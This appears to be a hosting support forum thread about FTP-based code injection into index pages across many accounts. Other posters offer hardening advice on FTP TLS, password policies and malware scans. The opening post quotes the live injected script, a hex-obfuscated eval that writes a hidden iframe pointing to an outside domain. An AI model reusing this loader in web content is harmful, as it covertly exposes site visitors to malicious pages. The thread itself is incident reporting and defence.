Code Injection

[rajguru]

Hi,

We are facing problem with code injection only in index pages on our servers. In messages we found uploading and downloading of index pages from one IP for all users. Following is the code which has been injected.
=============
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
=============

How can we prevent this? Please advise us.

[cPanelTristan]

What script was running that had the code injection or how was it accomplished precisely?

Do you have ModSecurity running on the machine? It might not have prevented the issue, but it could be useful to run on the machine regardless.

Next, do you have register_globals set to Off for the global php.ini file and, if you are using suPHP, are you preventing users from creating their own php.ini file?

[mikegotroot]

Are you sure this was via a web injection? The code may have also been added to the file via FTP, or shell (which is usually the case if a filed is modified). Do you see anything in your logs that would tell you this is web based, and not uploaded code?

[rajguru]

Hi,

Thanks for your help,

We are using suphp, modsecurity and registered global is off

We found following logs for every user with the same IP which is downloading and uploading index pages continuously.

xx.xx.xx.xx >> is hackers IP
======================
Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-blog-header.php uploaded (664 bytes, 17.76KB/sec)
Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php downloaded (32 bytes, 165.29KB/sec)
Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php uploaded (420 bytes, 11.62KB/sec)
Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html downloaded (4433 bytes, 220.11KB/sec)
Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html uploaded (4277 bytes, 102.88KB/sec)
Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizerftp/index.html downloaded (6100 bytes, 190.80KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php downloaded (32 bytes, 1.27KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php
======================

We are not sure how could this happen?

Pelase advise us.

[Defected]

1) Change the password for that account.
2) Tell the account owner to scan his computer with antivirus/antimalware/antispyware software.
3) Scan your pc's too.
4) Remove the injected code from the account files.

I believe this is a typical "client" side issue, where the computer is infected via the use of some sort of "cracked" software and the account credentials get stolen.

[rajguru]

Hello Defected,

Thanks for your help...but this is not for ony one account...our all servers having the same issue with all accounts. So please guide us how can we prevent this in future?

[cPanelTristan]

Are you forcing TLS for FTP connections in WHM > FTP Server Configuration area for the "TLS Encryption Support" dropdown? I woudl highly suggest changing it to "Required (Command/Data)" there.

Next, I would suggest enabling Configure Security Policies area in WHM to force password strength and password age requirements. This will make all users have to change their passwords and have a strong password.

For your customers, do you have another login system they use where you are storing their cPanel passwords somewhere? If your users have a login area like a billing system and you are storing passwords in that system, please ensure those passwords are being encrypted.